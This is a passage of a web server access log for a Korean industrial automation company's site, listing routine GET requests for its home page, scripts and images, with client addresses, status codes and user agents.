NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:31:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:31:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:31:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:31:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:31:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:31:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:31:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:31:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:31:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:31:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10397] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.google.com/" -[18/Feb/2026:02:31:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:31:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:31:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:31:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:31:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:31:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:31:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:31:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:31:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:31:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:31:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:31:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:31:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:32:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 162.120.184.59] [Length 10397] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.google.com/" -[18/Feb/2026:02:34:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10394] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[18/Feb/2026:02:40:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10520] [Gzip 5.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[18/Feb/2026:02:40:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:40:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:40:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:40:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:40:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:40:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:40:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:40:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:40:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:40:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:40:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:40:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:40:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:47:38 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 23.27.145.166] [Length 10510] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" -[18/Feb/2026:02:57:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10497] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[18/Feb/2026:02:57:59 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:02:58:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 162.120.184.40] [Length 10497] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.google.com/" -[18/Feb/2026:02:59:15 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 162.120.184.41] [Length 10497] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.google.com/" -[18/Feb/2026:03:10:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10497] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:03:10:40 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:03:10:40 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:03:38:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 149.57.180.66] [Length 10497] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "-" -[18/Feb/2026:03:38:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 149.57.180.66] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:03:38:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 149.57.180.66] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:03:38:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 149.57.180.66] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:03:38:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 149.57.180.66] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:03:38:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 149.57.180.66] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:03:38:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 149.57.180.66] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:03:38:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 149.57.180.66] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:03:38:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 149.57.180.66] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:03:38:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 149.57.180.66] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:03:38:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 149.57.180.66] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:03:38:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 149.57.180.66] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:03:38:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 149.57.180.66] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:04:00:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10497] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" -[18/Feb/2026:04:00:54 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:04:00:54 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:04:00:54 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:04:00:54 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:04:00:54 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:04:00:54 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:04:00:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:04:00:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:04:00:54 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:04:00:54 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:04:00:54 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:04:00:54 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:06:17:52 +0000] - - 301 - GET http www.hanmocnn.co.kr "/" [Client 34.38.25.53] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "-" -[18/Feb/2026:06:17:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 34.38.25.53] [Length 10497] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "http://www.hanmocnn.co.kr" -[18/Feb/2026:06:20:09 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:06:20:09 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:06:20:09 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:06:20:09 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 